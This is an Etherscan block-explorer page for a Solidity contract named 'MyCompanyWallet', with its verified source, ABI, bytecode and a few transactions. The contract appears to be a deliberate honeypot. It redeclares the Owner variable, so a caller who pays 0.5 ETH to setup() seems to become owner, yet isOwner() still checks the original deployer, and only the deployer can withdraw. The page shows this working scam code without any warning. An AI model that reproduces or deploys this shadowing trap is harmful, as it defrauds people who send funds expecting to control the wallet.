ETH Price: $2,636.30 (+6.16%)
Gas: 3 Gwei

Contract

0x78faF034C61F4158a4A12Bfa372187a21405Ae33
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Withdraw63129372018-09-11 16:19:592158 days ago1536682799IN
0x78faF034...21405Ae33
0 ETH0.000150875.1
Withdraw62703162018-09-04 12:37:222165 days ago1536064642IN
0x78faF034...21405Ae33
0 ETH0.000108435
Is Owner62703062018-09-04 12:36:072165 days ago1536064567IN
0x78faF034...21405Ae33
0 ETH0.000086884
Setup62698962018-09-04 10:56:082166 days ago1536058568IN
0x78faF034...21405Ae33
0.50398704 ETH0.000170924.1
0x6080604062690622018-09-04 7:31:132166 days ago1536046273IN
 Create: MyCompanyWallet
0 ETH0.000805034.1

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Block From To
63129372018-09-11 16:19:592158 days ago1536682799
0x78faF034...21405Ae33
0.50398704 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
MyCompanyWallet

Compiler Version
v0.4.24+commit.e67f0147

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2018-09-04
*/

pragma solidity ^0.4.24;

contract Ownable {
    address public Owner = msg.sender;
    function isOwner() public returns (bool) {
        if (Owner == msg.sender) {
            return true; 
        }
        return false;
    }
}

contract MyCompanyWallet is Ownable {
    address public Owner;
    
    function setup() public payable {
        if (msg.value >= 0.5 ether) {
            Owner = msg.sender;
        }
    }
    
    function withdraw() public {
        if (isOwner()) {
            msg.sender.transfer(address(this).balance);
        }
    }
    
    function() public payable { }
}

Contract Security Audit

Contract ABI

[{"constant":false,"inputs":[],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"isOwner","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"Owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"setup","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]

608060405260008054600160a060020a0319163317905534801561002257600080fd5b506101cd806100326000396000f3006080604052600436106100615763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416633ccfd60b81146100635780638f32d59b14610078578063b4a99a4e146100a1578063ba0bba40146100df575b005b34801561006f57600080fd5b506100616100e7565b34801561008457600080fd5b5061008d610125565b604080519115158252519081900360200190f35b3480156100ad57600080fd5b506100b6610155565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b610061610171565b6100ef610125565b15610123576040513390303180156108fc02916000818181858888f19350505050158015610121573d6000803e3d6000fd5b505b565b6000805473ffffffffffffffffffffffffffffffffffffffff1633141561014e57506001610152565b5060005b90565b60015473ffffffffffffffffffffffffffffffffffffffff1681565b6706f05b59d3b200003410610123576001805473ffffffffffffffffffffffffffffffffffffffff1916331790555600a165627a7a723058203fb34452cf383182a77f4781f1d7d32f24bbb4e7b2567a21568cf635b2781cf80029

Deployed Bytecode

0x6080604052600436106100615763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416633ccfd60b81146100635780638f32d59b14610078578063b4a99a4e146100a1578063ba0bba40146100df575b005b34801561006f57600080fd5b506100616100e7565b34801561008457600080fd5b5061008d610125565b604080519115158252519081900360200190f35b3480156100ad57600080fd5b506100b6610155565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b610061610171565b6100ef610125565b15610123576040513390303180156108fc02916000818181858888f19350505050158015610121573d6000803e3d6000fd5b505b565b6000805473ffffffffffffffffffffffffffffffffffffffff1633141561014e57506001610152565b5060005b90565b60015473ffffffffffffffffffffffffffffffffffffffff1681565b6706f05b59d3b200003410610123576001805473ffffffffffffffffffffffffffffffffffffffff1916331790555600a165627a7a723058203fb34452cf383182a77f4781f1d7d32f24bbb4e7b2567a21568cf635b2781cf80029

Swarm Source

bzzr://3fb34452cf383182a77f4781f1d7d32f24bbb4e7b2567a21568cf635b2781cf8

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.